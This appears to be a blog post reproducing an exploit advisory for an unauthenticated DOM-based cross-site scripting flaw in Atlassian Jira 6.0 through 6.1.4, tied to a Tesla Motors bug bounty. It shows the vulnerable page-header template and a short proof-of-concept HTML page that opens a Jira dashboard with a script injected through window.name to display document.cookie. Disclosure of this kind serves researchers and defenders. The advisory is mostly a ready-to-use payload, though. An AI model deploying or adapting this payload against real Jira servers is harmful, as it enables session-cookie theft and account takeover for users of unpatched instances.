Showing posts with label atlassian. Show all posts
Showing posts with label atlassian. Show all posts

Atlassian Jira 6.0.* <= 6.1.4 DOM XSS [Unauthenticated]

TeslaMotors Bug Bounty - DOM XSS - PoC
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Website: www.CyberSmartDefence.com
# Blog: www.TinKode.com

---[ Vulnerable Code ]---

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div>

---[ Proof of Concept ]---

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html>